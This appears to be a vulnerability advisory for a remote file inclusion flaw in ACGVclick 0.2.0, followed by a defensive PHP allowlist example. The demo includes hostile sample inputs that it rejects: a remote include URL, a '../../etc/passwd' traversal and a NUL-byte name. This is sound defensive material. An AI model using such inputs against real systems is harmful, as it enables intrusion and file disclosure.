vendor: ACGVclick
by: ajann
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name: ACGVclick
Affected Version From: 0.2.0
Affected Version To: 0.2.0
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
ACGVclick <= 0.2.0 (path) Remote File Include Vulnerability
ACGVclick version 0.2.0 is vulnerable to remote file inclusion. An attacker can include arbitrary files from a remote server by manipulating the 'path' parameter in the 'function.inc.php' file. By exploiting this vulnerability, an attacker can execute malicious code on the target system.
Mitigation:
To mitigate this vulnerability, it is recommended to update to a patched version of ACGVclick that addresses this issue. Alternatively, ensure that user input is properly validated and sanitized before including files.
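One way to apply the validation described above, as an added example that is not ACGVclick code: the request value is treated as a module name and mapped through an allowlist to a file under a fixed directory, so it never reaches `include` as a path or URL. `ALLOWED_MODULES`, `resolve_include()` and the module names are hypothetical.

```php
<?php
// Added example, not ACGVclick code. ALLOWED_MODULES and resolve_include()
// are hypothetical names; the module list is constructed.
const ALLOWED_MODULES = ['stats', 'banner'];

/**
 * Map a request-supplied value to a file under $baseDir, or return null.
 * The value is treated as a module name, never as a path or URL.
 */
function resolve_include(string $baseDir, string $requested): ?string
{
    // 1. Exact-match allowlist: rejects URLs, "../" sequences and NUL bytes.
    if (!in_array($requested, ALLOWED_MODULES, true)) {
        return null;
    }
    // 2. Canonicalise and confirm the file exists under the base directory
    //    (guards against symlinks that point outside it).
    $base = realpath($baseDir);
    $file = $base === false
        ? false
        : realpath($base . DIRECTORY_SEPARATOR . $requested . '.inc.php');
    if ($file === false || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $file;
}

// Constructed demo: a temporary include directory holding one module.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'acgv_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'stats.inc.php', "<?php // stub\n");

// Constructed inputs: one valid name, one allowlisted name with no file,
// a URL, a traversal sequence and a NUL-terminated name.
$samples = ['stats', 'banner', 'http://example.invalid/x.txt?', '../../etc/passwd', "stats\0"];
foreach ($samples as $value) {
    $resolved = resolve_include($dir, $value);
    printf("%-36s => %s\n",
        json_encode($value, JSON_UNESCAPED_SLASHES),
        $resolved === null ? 'rejected' : 'include ' . basename($resolved));
}

unlink($dir . DIRECTORY_SEPARATOR . 'stats.inc.php');
rmdir($dir);
```

Keeping PHP's `allow_url_include` setting off additionally stops `include` from fetching remote URLs even if a validation step is missed.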